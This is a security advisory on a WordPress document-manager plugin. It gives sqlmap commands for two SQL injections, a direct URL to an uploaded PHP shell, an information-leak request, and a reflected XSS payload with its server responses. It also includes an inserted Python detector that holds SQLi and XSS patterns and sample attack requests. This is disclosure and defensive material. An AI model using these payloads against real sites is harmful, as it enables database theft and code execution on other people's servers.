Multiple vulnerabilities in Wordpress plugin SP Projects & Document Manager Mar 06 2016 01:45PM
mail michaelhelwig de
* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version:
* Tested on: WordPress 4.4.1
* Category: webapps


The WordPress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered users,
SQL injection, information leakage and XSS by unregistered users.


1. SQL-Injections

Several SQL injections were known in version 2.4.1 and had been fixed in the meantime.
At least two of them reappeared in version

- the injection in the "id" parameter on

- and the POST parameter vendor_email on

See https://packetstormsecurity.com/files/129212/WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original report on this.

Both injections can be exploited by sqlmap:

[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) OR (1=1 *" --dbms mysql

2. Arbitrary code execution

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files typically
looks like


http://wordpress.local.de/wp-content/uploads/sp-client-document-manager/1/shell.php

Files can be accessed directly even if the option "Require Login to Download"
is checked in the plugin configuration.

3. Information leakage

Information about uploaded files can be retrieved by unauthenticated users via a
call to admin/ajax.php:

GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/

-- response --
200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json

"1","cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0","form_id":"0","entry_id":"0","group_id":"0","clie

Specifically, this reveals the uploading user's id and the filename, which is
enough to determine the URL for direct access to the file (see 2).

4. XSS Vulnerability

There is a reflected (non-persistent) XSS vulnerability in the admin/ajax.php file
for function=email-vendor:

POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded

-- response --
200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);</script></p>
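As an added defensive example (not part of the advisory or of the plugin), the following Python classifies requests against the attack surface described in sections 1, 2 and 4: non-numeric id values for function=download-project, SQL or script markers in vendor_email[] for function=email-vendor, and direct GETs of PHP files under the plugin's upload directory. The heuristics and the sample requests are constructed; the truncated information-leak endpoint of section 3 is not modelled.

```python
import re
from urllib.parse import urlparse, parse_qs

# Paths quoted in the advisory; wordpress.local.de is the advisory's own test host.
PLUGIN_AJAX = "/wp-content/plugins/sp-client-document-manager/admin/ajax.php"
UPLOAD_DIR = "/wp-content/uploads/sp-client-document-manager/"

# Loose heuristics (assumptions, tune to your traffic): a quote, a closing parenthesis
# or an SQL keyword where an integer or e-mail belongs; a tag or handler in text.
SQLI_RE = re.compile(r"""['")]|\b(or|and|union|select|sleep)\b""", re.I)
XSS_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|on[a-z]+\s*=", re.I)
PHP_EXT_RE = re.compile(r"\.php\d?(\.|$)", re.I)  # .php, .php5, also .php.jpg

def classify(method, url, body=""):
    """Return sorted finding tags for one request against the plugin's endpoints."""
    u = urlparse(url)
    query = parse_qs(u.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    if u.path == PLUGIN_AJAX:
        func = query.get("function", [""])[0]
        if func == "download-project":
            # 1. the "id" parameter must be a plain integer
            if any(not v.isdigit() for v in query.get("id", [])):
                findings.append("sqli:download-project:id")
        elif func == "email-vendor":
            # 1. and 4. PHP collects vendor_email[] into an array; inspect every element
            for v in form.get("vendor_email[]", []) + form.get("vendor_email", []):
                if SQLI_RE.search(v):
                    findings.append("sqli:email-vendor:vendor_email")
                if XSS_RE.search(v):
                    findings.append("xss:email-vendor:vendor_email")
    # 2. direct execution of a script under the plugin's upload directory
    if method == "GET" and u.path.startswith(UPLOAD_DIR) and PHP_EXT_RE.search(u.path):
        findings.append("php-in-uploads")
    return sorted(set(findings))

HOST = "http://wordpress.local.de"
SAMPLE_REQUESTS = [  # constructed traffic mirroring the advisory's requests
    ("GET", HOST + PLUGIN_AJAX + "?function=download-project&id=1", ""),
    ("GET", HOST + PLUGIN_AJAX + "?function=download-project&id=1%20OR%201%3D1", ""),
    ("POST", HOST + PLUGIN_AJAX + "?function=email-vendor", "vendor_email%5B%5D=0)%20OR%20(1%3D1%20"),
    ("POST", HOST + PLUGIN_AJAX + "?function=email-vendor", "vendor_email%5B%5D=%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E"),
    ("GET", HOST + UPLOAD_DIR + "1/shell.php", ""),
    ("GET", HOST + UPLOAD_DIR + "1/report.pdf", ""),
]

def scan(requests=SAMPLE_REQUESTS):
    # (url, findings) for every request that trips at least one heuristic
    return [(url, classify(m, url, b)) for m, url, b in requests if classify(m, url, b)]
```

The two benign sample requests (id=1 and the PDF download) produce no findings, so `scan()` returns four flagged entries.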


2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from WordPress security team
2016/03/02 - Vendor released security update - issues fixed


Update to the latest version.
